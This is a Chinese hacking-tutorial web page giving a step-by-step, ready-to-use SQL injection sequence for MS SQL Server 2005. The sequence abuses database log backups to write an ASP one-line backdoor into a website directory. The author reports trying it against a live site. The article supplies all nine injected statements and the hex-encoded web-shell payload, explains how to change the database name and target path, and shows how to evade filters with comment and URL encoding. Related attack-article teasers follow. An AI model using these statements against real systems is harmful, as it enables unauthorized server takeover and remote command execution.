mssql2005 DB权限导出一句话

所属分类: 网络安全 / 脚本攻防 阅读数: 197
收藏 0 赞 0 分享
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。

后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。

第一步
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--

第二步:
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第三步
;drop/**/table/**/[itpro]--

第四步
;create/**/table/**/[itpro]([a]/**/image)--

第五步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第六步
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--

第七步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第八步
;drop/**/table/**/[itpro]--

第九步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
更多精彩内容其他人还在看

网站防范 "上传漏洞"入侵的方法

“上传漏洞”入侵是目前对网站最广泛的入侵方法。90%的具有上传页面的网站,都存在上传漏洞。本文将介绍常见的上传漏洞及其防范技巧。
收藏 0 赞 0 分享

如何检测SQL注入技术以及跨站脚本攻击

在最近两年中,安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有遵循 安全代码进行开发,攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref1]和CSS[
收藏 0 赞 0 分享

Oracle的使用技巧以及脚本代码

如何查看ORACLE的隐含参数?ORACLE的显式参数,除了在INIT.ORA文件中定义的外,在svrmgrl中用 show parameter * ,可以显示。但ORACLE还有一些参数是以 _ ,开头的。如我们非常熟悉的_offline_rollback_segments等。
收藏 0 赞 0 分享

php包含漏洞替代技术的方法与介绍 php文件包含漏洞详解

php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数,特别是include()和require()这两个函数。 这个常见的错误导致了众所周知的远程文件包含漏洞和本地文件包含漏洞。
收藏 0 赞 0 分享

一次奇遇的渗透

其实这一步可以完全省略,都说了是奇遇了。其实就是检查下自己的站点是否安全
收藏 0 赞 0 分享

mssql2005 DB权限导出一句话

昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限
收藏 0 赞 0 分享

PHP木马大全 一句话的PHP木马的防范

php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢
收藏 0 赞 0 分享

PoisonIvy Rat 远程溢出实战

这个Exploit已经集成在最新版本的Msf中了,老外的文章里也有源文件,可以修改后单独提出来.
收藏 0 赞 0 分享

防止SQL注入攻击的一些方法小结

SQL注入攻击的危害性很大。在讲解其防止办法之前,数据库管理员有必要先了解一下其攻击的原理。这有利于管理员采取有针对性的防治措施
收藏 0 赞 0 分享

脚本入侵 入侵ewebeditor编辑器一些技巧

脚本入侵 入侵ewebeditor编辑器一些技巧,使用ewebeditor的朋友可以参考下。
收藏 0 赞 0 分享
查看更多